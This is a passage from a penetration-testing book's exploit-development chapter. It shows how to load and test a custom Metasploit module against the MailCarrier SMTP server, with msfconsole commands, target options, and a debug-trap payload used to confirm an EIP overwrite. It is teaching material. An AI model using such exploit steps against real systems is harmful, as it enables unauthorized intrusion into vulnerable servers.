220
Chapter 15
In this case, we’ve selected an interrupt (breakpoint) at so that execution
will pause when it reaches our shellcode without us having to set a breakpoint.
Having configured the exploit section, we save the file as
mailcarrier_book.rb
at
modules/exploits/windows/smtp/
.
Testing Our Base Exploit
In the next step, we load the module in
msfconsole
, set the required options,
and configure a payload of
generic/debug_trap
(a great payload for exploit
development that triggers a stop point when you are tracing the application
in a debugger). Then we run the module:
msf >
use exploit/windows/smtp/mailcarrier_book
msf exploit(mailcarrier_book) >
show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The local address
RHOST yes The target address
RPORT 25 yes The target port
Exploit target:
Id Name
-- ----
0 Windows XP SP2 - EN
msf exploit(mailcarrier_book) >
set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(mailcarrier_book) >
set RHOST 192.168.1.155
RHOST => 192.168.1.155
msf exploit(mailcarrier_book)
>
set payload generic/debug_trap
payload => generic/debug_trap
msf exploit(mailcarrier_book) >
exploit
[*] Exploit completed, but no session was created.
msf exploit(mailcarrier_book) >
We set the options as if we were running a normal exploit, except that we
use the
generic/debug_trap
payload to test our exploit.
After the module runs, the debugger should pause with EIP overwritten
by
42424242
as shown in Figure 15-1; if you see a successful EIP overwrite
of
42424242
, you know your exploit is working. Notice in Figure 15-1 that the
EIP register points to 42424242 and that the NOP slide and the dummy pay-
load have made it into the buffer as expected.